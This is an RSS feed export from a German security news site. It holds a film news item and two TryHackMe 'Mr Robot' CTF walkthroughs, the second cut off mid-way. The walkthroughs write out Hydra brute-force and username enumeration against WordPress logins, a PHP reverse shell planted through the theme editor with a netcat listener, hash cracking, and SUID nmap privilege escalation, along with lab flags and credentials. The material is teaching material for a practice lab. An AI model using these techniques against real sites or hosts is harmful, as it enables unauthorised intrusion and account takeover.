<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=elliot%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Fri, 31 Jul 2026 08:53:47 +0200</lastBuildDate>
<pubDate>Fri, 31 Jul 2026 08:53:47 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=elliot%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=elliot%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Tom Holland Confirms Fred Astaire Biopic Is His Next Film]]></title>
<description><![CDATA[Tom Holland has confirmed that his long-awaited Fred Astaire biopic will be his next film, with the actor already preparing for its demanding dance sequences.



Tom Holland plans to perform every dance himself



Holland wants to recreate Astaire’s famous performance style as closely as possible...]]></description>
<link>https://tsecurity.de/de/3689153/ios-mac-os/tom-holland-confirms-fred-astaire-biopic-is-his-next-film/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689153/ios-mac-os/tom-holland-confirms-fred-astaire-biopic-is-his-next-film/</guid>
<pubDate>Thu, 23 Jul 2026 15:16:57 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tom Holland has confirmed that his long-awaited Fred Astaire biopic will be his next film, with the actor already preparing for its demanding dance sequences.



Tom Holland plans to perform every dance himself



Holland wants to recreate Astaire’s famous performance style as closely as possible. He plans to complete all the dancing himself without using body doubles.



The actor also hopes the production can film complete dance routines in a single continuous shot. This approach would keep Holland’s full body visible and allow audiences to watch each movement without frequent cuts.



Holland admitted that the preparation brings both excitement and “absolute dread.” He has already returned to the dance studio and plans to continue intensive training once his current promotional commitments end.



The role also gives Holland an opportunity to use his earlier dance training. Before becoming widely known as Spider-Man, he performed in the stage production of Billy Elliot the Musical in London.



Paul King will direct the Fred Astaire biopic



Paul King, known for directing the Paddington films and Wonka, remains attached to direct the untitled project. The film has been in development since Holland first announced his involvement in 2021.



Earlier reports indicated that the story would explore Astaire’s relationship with his sister and early dancing partner, Adele Astaire. However, official plot details and additional casting information have not been announced.



Production listings currently point to filming beginning in January 2027, although Sony has not confirmed an official release date.



Holland’s decision to avoid doubles will make the Fred Astaire biopic one of his most physically demanding projects. His commitment to long, uninterrupted dance scenes could also help the film capture the style that made Astaire one of Hollywood’s most celebrated performers.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr Robot CTF Walkthrough -TryHackMe Detailed]]></title>
<description><![CDATA[Writeup by CobrakaiI recently solved the Mr Robot CTF room on TryHackMe. The room is rated medium, but what I liked about it is that it connects a lot of basic penetration testing concepts together: web enumeration, robots.txt inspection, source-code review, WordPress login discovery, reverse she...]]></description>
<link>https://tsecurity.de/de/3646316/hacking/mr-robot-ctf-walkthrough-tryhackme-detailed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646316/hacking/mr-robot-ctf-walkthrough-tryhackme-detailed/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:10 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/437/1*VBbNWudhR1HvtyMylXnNMg.png"><figcaption>Writeup by Cobrakai</figcaption></figure><p>I recently solved the <strong>Mr Robot CTF</strong> room on TryHackMe. The room is rated medium, but what I liked about it is that it connects a lot of basic penetration testing concepts together: web enumeration, robots.txt inspection, source-code review, WordPress login discovery, reverse shells, hash cracking, Linux privilege escalation, and SUID abuse.</p><p>This writeup follows the complete path I used to move from initial access to root. I have also added explanations for every important step, because the real value of this box is not only getting the flags, but understanding why each step matters.</p><h3>Lab Setup</h3><p>First, I started the TryHackMe machine and connected my Kali Linux machine to the TryHackMe VPN.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*WUrhtTw1IfF6ifUf3IkJGA.png"><figcaption>Command to run to connect to the VPN</figcaption></figure><p>To connect Kali with TryHackMe, download your OpenVPN configuration file from:</p><p><strong>TryHackMe → Access → VPN Settings → Download Configuration File</strong></p><p>If the VPN file is on Windows and your Kali machine is running inside VMware, you can transfer it using scp:</p><pre>scp &lt;FULL-WINDOWS-FILE-PATH&gt; &lt;KALI-USERNAME&gt;@&lt;KALI-IP&gt;:&lt;DESTINATION-PATH&gt;</pre><p>Example:</p><pre>scp C:\Users\user\Downloads\cyberpat.ovpn kali@192.168.1.10:/home/kali/</pre><p>After that, start the VPN connection from Kali:</p><pre>sudo openvpn &lt;FILENAME&gt;.ovpn</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*WUrhtTw1IfF6ifUf3IkJGA.png"><figcaption>Command to run to connect to the VPN</figcaption></figure><p>Once the VPN was connected, I started the target machine and received the target IP address.</p><h3>Opening the Web Application</h3><p>I opened the target IP in the browser:</p><pre>http://&lt;TARGET-IP&gt;</pre><p>The homepage showed a terminal-style Mr Robot themed interface. There were many commands visible on the page, but they were mostly visual distractions. In this room, the actual path comes from proper enumeration.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/677/1*O2PdkxBJXwnZjCDYXotcSA.png"><figcaption>Front Web Page of the App Part 1</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*Ix5Nxx8pZ5hHLFbMUzurXw.png"><figcaption>Front Web Page of the App Part 2</figcaption></figure><h3>Checking robots.txt</h3><p>Before running heavy enumeration, I checked the simplest and most common file first:</p><pre>http://&lt;TARGET-IP&gt;/robots.txt</pre><p>robots.txt is a plain text file placed at the root of a website. It tells search engine crawlers which paths they are allowed or not allowed to crawl.</p><p>In CTFs, this file is often used to hide interesting paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*m5Pf6nr3_XxwMUFa2FnlnA.png"><figcaption>Checking Robots.txt</figcaption></figure><p>Inside robots.txt, I found two interesting entries:</p><pre>key-1-of-3.txt<br>fsocity.dic</pre><p>I opened the first file and got the first key:</p><pre>073403c8a58a1f80d943455fb30724b9</pre><p>So the first key was recovered successfully.</p><h3>Nmap Enumeration</h3><p>While checking the web application manually, I also ran an Nmap scan in parallel.</p><pre>sudo nmap -sC -sV -O -A &lt;TARGET-IP&gt;</pre><p>The goal of this scan was to identify open ports, running services, versions, and possible operating system details.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*XcmS17aaKWaV9wFazMeDyg.png"><figcaption>Nmap Scan 1</figcaption></figure><p>The scan showed these important services:</p><pre>22/tcp   open   ssh<br>80/tcp   open   http<br>443/tcp  open   https</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*l7aZo93PY5Mr5f5VFWTasg.png"><figcaption>Nmap Scan 2</figcaption></figure><p>Some useful observations from the scan:</p><ul><li>SSH was exposed remotely.</li><li>HTTP was available on port 80.</li><li>HTTPS was available on port 443.</li><li>The web server disclosed Apache/Ubuntu details.</li><li>The SSL certificate appeared expired.</li></ul><p>These are not direct exploitation points by themselves, but they help build a picture of the target.</p><h3>Downloading fsocity.dic</h3><p>The second interesting file from robots.txt was:</p><pre>fsocity.dic</pre><p>I opened it in the browser and saw that it contained a large wordlist.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/712/1*xuaZvg6pU910v2d3qUx2Sg.png"><figcaption>Downloading the Wordlists</figcaption></figure><p>This wordlist becomes useful later for the alternative Hydra-based username and password discovery method.</p><h3>Directory Enumeration with Gobuster</h3><p>Next, I used Gobuster to enumerate hidden directories and files on the web server.</p><pre>sudo gobuster dir -u http://&lt;TARGET-IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50 -k</pre><p>Command breakdown:</p><pre>dir</pre><p>Runs Gobuster in directory brute-forcing mode.</p><pre>-u http://&lt;TARGET-IP&gt;</pre><p>Specifies the target URL.</p><pre>-w</pre><p>Specifies the wordlist.</p><pre>-t 50</pre><p>Uses 50 threads to speed up the scan.</p><pre>-k</pre><p>Skips TLS certificate verification. This is mostly useful for HTTPS targets, but it does not hurt if reused in the command.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*JcomDvLAAlnEV-kNXLMicQ.png"><figcaption>Gobuster Scan Running</figcaption></figure><p>Gobuster returned several interesting paths, including WordPress-related directories.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*-pjY06PZDTX7PAsmZjJO0Q.png"><figcaption>Gobuster Scan Results</figcaption></figure><p>Important findings included:</p><pre>/wp-admin<br>/wp-content<br>/wp-includes<br>/wp-login.php<br>/license<br>/readme</pre><p>The /wp-login.php path confirmed that the target was running WordPress.</p><h3>WordPress Login Page</h3><p>I opened the login page:</p><pre>http://&lt;TARGET-IP&gt;/wp-login.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*qJBRxhlW97Bu-NP4amSxNw.png"><figcaption>Wp-Login Page</figcaption></figure><p>At this point, I needed valid WordPress credentials. The next useful path was /license.</p><h3>Inspecting /license</h3><p>I opened:</p><pre>http://&lt;TARGET-IP&gt;/license</pre><p>The page showed a suspicious message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/691/1*S5LU74vlvb2K7yOFFyJ6cQ.png"><figcaption>Navigated to the /license Directory</figcaption></figure><p>Whenever a page looks suspicious in a CTF, checking the source code is a good habit. I viewed the page source and found a Base64-looking string hidden inside.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/722/1*JrOrvao3rNySKHEHm8R15A.png"><figcaption>Text at Bottom</figcaption></figure><p>I decoded the Base64 string and recovered credentials for the WordPress user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*D8BKNTBXYnwHqxmfbQFJpA.png"><figcaption>Decoding the Text</figcaption></figure><p>The credentials were:</p><pre>Username: elliot<br>Password: ER28-0652</pre><p>Using these credentials, I logged in to the WordPress admin panel.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*s0BvDREHoEJmof1w9hSgeg.png"><figcaption>Wp-Login Successfull</figcaption></figure><h3>Getting a Reverse Shell through WordPress Theme Editor</h3><p>After logging into WordPress, I started exploring the admin panel.</p><p>The important section was:</p><pre>Appearance → Theme Editor</pre><p>The Theme Editor allowed editing PHP files directly from the WordPress dashboard. This is dangerous because PHP code executed by the web server can be abused to get a reverse shell.</p><p>A reverse shell is a shell where the target machine connects back to the attacker machine.</p><p>In simple terms:</p><ol><li>I start a listener on my machine.</li><li>I place a reverse shell payload on the target.</li><li>The target connects back to my listener.</li><li>I get command execution on the target.</li></ol><p>I used a PHP reverse shell payload generated from:</p><pre>https://www.revshells.com/</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*3UchA43HXsnFpG82qb8u-Q.png"><figcaption>https://revershells.com/</figcaption></figure><p>Important point:</p><p>The IP address inside the reverse shell payload must be the attacker machine IP, not the target IP.</p><p>To find the attacker VPN IP, use:</p><pre>ip a</pre><p>Usually, the TryHackMe VPN interface is tun0.</p><p>Then I edited a PHP theme file from the WordPress Theme Editor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*zzeZXtnC53Xqp13Lj1kWwg.png"><figcaption>Replacing with the PHP Reverse Shell Code</figcaption></figure><p>I pasted the PHP reverse shell payload into a theme file such as:</p><pre>archive.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*37-Uh02yebTRGbS8NOc0AA.png"><figcaption>Pasted the Code</figcaption></figure><p>Before triggering the payload, I started a Netcat listener on my Kali machine:</p><pre>nc -lvnp 4444</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*vFOHGgyyrEDDoq71Uo7VdA.png"><figcaption>Netcat Listener Started</figcaption></figure><p>Then I accessed the modified PHP file from the browser:</p><pre>http://&lt;TARGET-IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*DWV67QlA1XOYgG9seCe7mg.png"><figcaption>Accessing that Edited PHP File</figcaption></figure><p>Once the page was opened, the target connected back to my listener.</p><h3>Initial Shell Access</h3><p>The reverse shell connected successfully.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*OQyRkLeDQWLzedGiL85_dw.png"><figcaption>Voila, Got the Reverse Shell</figcaption></figure><p>I checked the current user:</p><pre>whoami</pre><p>The shell was running as the web server user, not as root.</p><p>Then I started enumerating the filesystem.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*BScsAYqgAMEJ8iOC7bEsOg.png"><figcaption>Got the Key 2 As Well</figcaption></figure><p>Inside /home/robot, I found:</p><pre>key-2-of-3.txt<br>password.raw-md5</pre><p>The second key file was not directly readable because of permissions. However, the password hash file was readable.</p><p>The hash looked like this:</p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><p>This was an MD5 hash for the robot user.</p><h3>Cracking the Robot User Hash</h3><p>I cracked the MD5 hash and got the password:</p><pre>abcdefghijklmnopqrstuvwxyz</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*Cq5fXr8MtrmOoBUp7gV1rw.png"><figcaption>Cracking the Robot Password</figcaption></figure><p>Before switching users, I stabilized the shell.</p><p>A basic reverse shell often behaves badly:</p><ul><li>Arrow keys may not work.</li><li>Ctrl + C may kill the shell.</li><li>su, clear, nano, and similar commands may not work properly.</li><li>There is no proper TTY.</li></ul><p>To spawn a better shell, I used:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*m-8NWLldbgqSgzJysMESVA.png"><figcaption>Switching to the Robot User</figcaption></figure><p>Then I switched to the robot user:</p><pre>su robot</pre><p>Password:</p><pre>abcdefghijklmnopqrstuvwxyz</pre><p>After switching users, I read the second key:</p><pre>cat /home/robot/key-2-of-3.txt</pre><p>The second key was:</p><pre>822c73956184f694993bede3eb39f959</pre><p>I confirmed the current user:</p><pre>whoami<br>id<br>hostname</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*ajN7CbP56HWgIitDX0Vm9w.png"></figure><h3>Privilege Escalation Enumeration</h3><p>At this point, I had access as the robot user, but the final key was inside /root, so privilege escalation was required.</p><p>One common Linux privilege escalation technique is checking for SUID binaries.</p><p>SUID stands for <strong>Set User ID</strong>.</p><p>If a binary has the SUID bit enabled, it runs with the permissions of the file owner instead of the user who executes it.</p><p>If a SUID binary is owned by root, it may be possible to abuse it for root-level execution.</p><p>I searched for SUID binaries using:</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Command breakdown:</p><pre>find /</pre><p>Search from the root of the filesystem.</p><pre>-perm -u=s</pre><p>Find files where the SUID bit is set for the owner.</p><pre>-type f</pre><p>Only return regular files.</p><pre>2&gt;/dev/null</pre><p>Hide permission-denied errors.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*xATgnc0v_thCZNmhW5jSuw.png"><figcaption>Finding the SUID Permissions</figcaption></figure><p>The interesting result was:</p><pre>/usr/local/bin/nmap</pre><p>This stood out because nmap should normally not be SUID.</p><p>Also, the location was suspicious:</p><pre>/usr/local/bin/nmap</pre><p>The /usr/local/bin directory usually contains manually installed binaries, not default system binaries.</p><p>Older versions of Nmap had an interactive mode that could execute shell commands. If that old Nmap binary has the SUID bit and is owned by root, it can be abused to spawn a root shell.</p><p>I checked it using:</p><pre>ls -la /usr/local/bin/nmap<br>/usr/local/bin/nmap --version</pre><p>Then I started interactive mode:</p><pre>/usr/local/bin/nmap --interactive</pre><p>Inside the Nmap interactive prompt, I used:</p><pre>!sh</pre><p>That spawned a shell.</p><p>I confirmed root access:</p><pre>whoami</pre><p>Output:</p><pre>root</pre><p>Then I read the final key:</p><pre>cat /root/key-3-of-3.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*qXCV_UlQNk6RdxPtqOKmzg.png"><figcaption>Voila, Got 3rd Key As Well.</figcaption></figure><p>The third key was:</p><pre>04787ddef27c3dee1ee161b21670b4e4</pre><p>At this point, all three keys were recovered.</p><h3>Alternative Method: Finding Elliot Credentials with Hydra</h3><p>The /license method gives the WordPress password quickly, but there is another method using the fsocity.dic wordlist.</p><p>This method is useful because it teaches how to use Hydra against a WordPress login form.</p><h3>Cleaning the Wordlist</h3><p>First, I checked the size of the original wordlist:</p><pre>wc -w fsocity.dic</pre><p>The file was very large and had many duplicate entries.</p><p>To clean it, I sorted the file and removed duplicates:</p><pre>sort fsocity.dic | uniq &gt; fs-list</pre><p>Then I checked the size again:</p><pre>wc -w fs-list</pre><p>Command breakdown:</p><pre>wc -w fsocity.dic</pre><p>Counts the number of words in fsocity.dic.</p><pre>sort fsocity.dic</pre><p>Sorts the wordlist alphabetically.</p><pre>uniq</pre><p>Removes adjacent duplicate lines.</p><pre>&gt; fs-list</pre><p>Saves the cleaned output into a new file named fs-list.</p><p>This smaller cleaned wordlist makes Hydra faster.</p><h3>Finding the Valid WordPress Username</h3><p>Using Burp Suite, I inspected the WordPress login request.</p><p>The important POST parameters were:</p><pre>log<br>pwd</pre><p>WordPress used this error message when the username was invalid:</p><pre>Invalid username</pre><p>So I used Hydra to test every word from fs-list as a possible username while keeping the password fixed as test.</p><pre>hydra -L fs-list -p test &lt;TARGET-IP&gt; http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><p>Command breakdown:</p><pre>-L fs-list</pre><p>Use usernames from the file fs-list.</p><pre>-p test</pre><p>Use one static password: test.</p><pre>http-post-form</pre><p>Tell Hydra that the target login uses an HTTP POST form.</p><pre>/wp-login.php</pre><p>WordPress login endpoint.</p><pre>log=^USER^&amp;pwd=^PASS^</pre><p>Hydra replaces ^USER^ with each username from the file and ^PASS^ with the static password.</p><pre>F=Invalid username</pre><p>Failure condition. If the response contains Invalid username, Hydra treats the attempt as failed.</p><pre>-t 30</pre><p>Run 30 parallel tasks.</p><p>Hydra found the valid username:</p><pre>elliot</pre><p>Important note: Hydra may show test beside the username in this step. That does not mean test is the correct password. It only means the username is valid.</p><h3>Finding Elliot’s Password</h3><p>After finding the username, I kept the username fixed and brute-forced the password using the same cleaned wordlist.</p><p>WordPress shows a different error when the username is valid but the password is wrong:</p><pre>The password you entered for the username</pre><p>So I used that as the failure condition:</p><pre>hydra -l elliot -P fs-list &lt;TARGET-IP&gt; http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p>Command breakdown:</p><pre>-l elliot</pre><p>Use one static username.</p><pre>-P fs-list</pre><p>Use passwords from the file fs-list.</p><pre>F=The password you entered for the username</pre><p>If this message appears, Hydra knows the password is wrong.</p><p>Hydra found the valid credentials:</p><pre>Username: elliot<br>Password: ER28-0652</pre><p>These credentials can be used to log in here:</p><pre>http://&lt;TARGET-IP&gt;/wp-login.php</pre><h3>What I Learned</h3><p>This room is a good example of why basic enumeration matters.</p><p>The important lessons were:</p><ul><li>Always check robots.txt.</li><li>Do not ignore source code comments or hidden strings.</li><li>Directory brute-forcing can reveal critical application paths.</li><li>WordPress admin access can lead to code execution if theme editing is available.</li><li>Reverse shells require the attacker IP, not the target IP.</li><li>Always stabilize your shell before using commands like su.</li><li>Readable password hashes can lead to user switching.</li><li>SUID binaries are a major Linux privilege escalation vector.</li><li>Unusual SUID binaries in /usr/local/bin deserve attention.</li><li>Old versions of common tools can become privilege escalation paths.</li></ul><p>The box starts with simple web enumeration and ends with Linux privilege escalation through an old SUID Nmap binary. That makes it a solid practice machine for connecting web exploitation with post-exploitation basics.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=678d7908d472" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/mr-robot-ctf-walkthrough-tryhackme-detailed-678d7908d472">Mr Robot CTF Walkthrough -TryHackMe Detailed</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Mr. Robot CTF | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: Mr. Robot CTFDifficulty: MediumAuthor: Shikhali Jamalzade (@alisalive)Date: May 2026Tags: #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.” — Mr. RobotIntroductionThe Mr. ...]]></description>
<link>https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</guid>
<pubDate>Wed, 24 Jun 2026 16:55:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oEKhllKIF6aLRt62C2KnOQ.png"></figure><h4><strong>Platform:</strong> <a href="https://tryhackme.com/p/alisalive.exe">TryHackMe</a><br><strong>Room:</strong> <a href="https://tryhackme.com/room/mrrobot">Mr. Robot CTF</a><br><strong>Difficulty:</strong> Medium<br><strong>Author:</strong> Shikhali Jamalzade (<a href="https://github.com/alisalive">@alisalive</a>)<br><strong>Date:</strong> May 2026<br><strong>Tags:</strong> #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot</h4><p><em>“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.”</em> — Mr. Robot</p><h3>Introduction</h3><p>The <strong>Mr. Robot CTF</strong> room on TryHackMe is inspired by the cult TV series of the same name — a show about hacking, manipulation, and power. Created by security researcher <strong>Leon Johnson</strong>, the room presents a realistic attack surface: a WordPress-powered web server with deliberately weak credentials and a classic privilege escalation vector involving a SUID binary.</p><p>Your mission: find <strong>3 hidden keys</strong> on the machine.</p><p>In this write-up, I’ll walk through every step of the compromise — from initial reconnaissance all the way to root. I’ll explain the <em>why</em> behind each tool and technique, not just the <em>how</em>.</p><h3>Environment Setup</h3><p>Before anything, connect to the TryHackMe VPN:</p><p>bash</p><pre>sudo openvpn your-config.ovpn</pre><p>Once connected, deploy the Mr. Robot machine from the room page. Note the assigned IP (referred to as &lt;TARGET_IP&gt; throughout this write-up).</p><h3>Phase 1 — Reconnaissance</h3><h3>Nmap Port Scan</h3><p>Every engagement begins with understanding the attack surface. We’ll use <strong>nmap</strong> to identify open ports, services, and versions.</p><p>bash</p><pre>nmap -sC -sV -T4 -oN nmap_scan.txt &lt;TARGET_IP&gt;</pre><p><strong>Flag breakdown:</strong></p><ul><li>-sC — Run default NSE scripts (useful for detecting common vulns and misconfigs)</li><li>-sV — Probe service versions</li><li>-T4 — Aggressive timing (faster on stable networks)</li><li>-oN — Save output to file for reference</li></ul><p><strong>Results:</strong></p><pre>PORT    STATE  SERVICE  VERSION<br>80/tcp  open   http     Apache httpd<br>443/tcp open   ssl/http Apache httpd<br>22/tcp  closed ssh</pre><p>Two web servers (HTTP + HTTPS) are running on a standard Apache stack. SSH is closed, so our initial foothold will be through the web.</p><h3>Phase 2 — Web Enumeration</h3><h3>Visiting the Website</h3><p>Navigate to http://&lt;TARGET_IP&gt; in your browser. You'll be greeted by an interactive terminal simulation themed around the Mr. Robot show. It's visually impressive but doesn't contain anything useful for exploitation — feel free to play around though.</p><h3>robots.txt — The First Lead</h3><p>A robots.txt file tells web crawlers which paths to avoid. It's frequently overlooked by developers, but for pentesters it's a goldmine.</p><p>bash</p><pre>curl http://&lt;TARGET_IP&gt;/robots.txt</pre><p><strong>Output:</strong></p><pre>User-agent: *<br>fsocity.dic<br>key-1-of-3.txt</pre><p>Two files are disclosed:</p><ul><li>fsocity.dic — a wordlist (we'll use this to brute-force WordPress)</li><li>key-1-of-3.txt — the first flag</li></ul><p>Download both immediately:</p><p>bash</p><pre>wget http://&lt;TARGET_IP&gt;/fsocity.dic<br>wget http://&lt;TARGET_IP&gt;/key-1-of-3.txt<br>cat key-1-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 1:</em></strong><em> </em><em>073403c8a58a1f80d943455fb30724b9</em></blockquote><h3>Directory Brute-Forcing with Gobuster</h3><p>To map the full attack surface, we enumerate hidden directories:</p><p>bash</p><pre>gobuster dir -u http://&lt;TARGET_IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50</pre><p>Key findings:</p><pre>/wp-login    (Status: 200)<br>/wp-admin    (Status: 301)<br>/robots      (Status: 200)<br>/readme      (Status: 200)<br>/sitemap     (Status: 200)<br>/wp-content  (Status: 301)</pre><p>The presence of /wp-login confirms this is a <strong>WordPress</strong> installation. This opens up a well-documented attack path.</p><h3>Phase 3 — WordPress Credential Brute-Force</h3><h3>Preparing the Wordlist</h3><p>The fsocity.dic file contains <strong>858,160 words</strong> — most of them duplicates. Running a brute-force with this as-is would waste significant time. We deduplicate it first:</p><p>bash</p><pre>wc -w fsocity.dic         # 858160 words<br>sort fsocity.dic | uniq &gt; fs-clean.txt<br>wc -w fs-clean.txt        # 11451 words — a 98.7% reduction</pre><p>Always optimize your wordlists before launching attacks. Speed matters in real engagements.</p><h3>Username Enumeration with Hydra</h3><p>WordPress gives different error messages depending on whether a username exists:</p><ul><li>Invalid username → ERROR: Invalid username.</li><li>Valid username, wrong password → ERROR: The password you entered for the username … is incorrect.</li></ul><p>We exploit this <strong>username enumeration</strong> vulnerability to find valid users first, then pivot to password brute-forcing.</p><p>Start by capturing a failed login request with <strong>Burp Suite</strong> to identify the POST parameters (log and pwd). Then launch Hydra:</p><p>bash</p><pre>hydra -L fs-clean.txt -p test &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><ul><li>-L fs-clean.txt — username wordlist</li><li>-p test — static placeholder password (we only care about username validity here)</li><li>F=Invalid username — string that indicates a failed attempt (Hydra ignores these)</li></ul><p><strong>Result:</strong> Valid username found → elliot</p><h3>Password Brute-Force</h3><p>Now that we have a valid username, we brute-force the password using the same deduplicated list:</p><p>bash</p><pre>hydra -l elliot -P fs-clean.txt &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p><strong>Result:</strong> Password found → ER28-0652</p><p><strong>Alternative — WPScan:</strong></p><p>bash</p><pre>wpscan --url http://&lt;TARGET_IP&gt; -U elliot -P fs-clean.txt -t 50</pre><p>WPScan is purpose-built for WordPress and tends to be faster for this specific task.</p><h3>Phase 4 — WordPress Remote Code Execution</h3><h3>Gaining Admin Access</h3><p>Navigate to http://&lt;TARGET_IP&gt;/wp-login.php and log in with:</p><ul><li><strong>Username:</strong> elliot</li><li><strong>Password:</strong> ER28-0652</li></ul><p>Elliot has full administrator privileges. Welcome to the dashboard.</p><h3>Uploading a PHP Reverse Shell</h3><p>WordPress administrators can edit theme template files — raw PHP. This is our injection point.</p><p>Navigate to: <strong>Appearance → Theme Editor → Select a template (e.g., </strong><strong>archive.php or </strong><strong>404.php)</strong></p><p>Replace the entire file content with <strong>PentestMonkey’s PHP reverse shell</strong>:</p><pre>https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php</pre><p>Before saving, edit these two lines to match your attacking machine:</p><p>php</p><pre>$ip = '&lt;YOUR_ATTACKING_IP&gt;';   // your TryHackMe VPN IP (tun0)<br>$port = 4444;                   // or any port you choose</pre><p>Click <strong>Update File</strong>.</p><h3>Setting Up the Listener</h3><p>On your attacking machine:</p><p>bash</p><pre>nc -lvnp 4444</pre><h3>Triggering the Shell</h3><p>Now visit the modified template URL in your browser. For the archive.php template, it would be:</p><pre>http://&lt;TARGET_IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><p>Check your terminal — you should have a reverse shell as daemon:</p><p>bash</p><pre>$ whoami<br>daemon</pre><h3>Phase 5 — Post-Exploitation &amp; Key 2</h3><h3>Exploring the Filesystem</h3><p>Navigate to the home directory:</p><p>bash</p><pre>cd /home/robot<br>ls -la</pre><p><strong>Output:</strong></p><pre>-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt<br>-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5</pre><p>We can see key-2-of-3.txt, but it's only readable by the robot user. However, password.raw-md5 is world-readable:</p><p>bash</p><pre>cat password.raw-md5</pre><p><strong>Output:</strong></p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><h3>Cracking the MD5 Hash</h3><p>The hash format is MD5 (hinted by the filename). Crack it using:</p><p><strong>Option 1 — CrackStation (online):</strong> Paste the hash at <a href="https://crackstation.net/">crackstation.net</a></p><p><strong>Option 2 — John the Ripper:</strong></p><p>bash</p><pre>echo 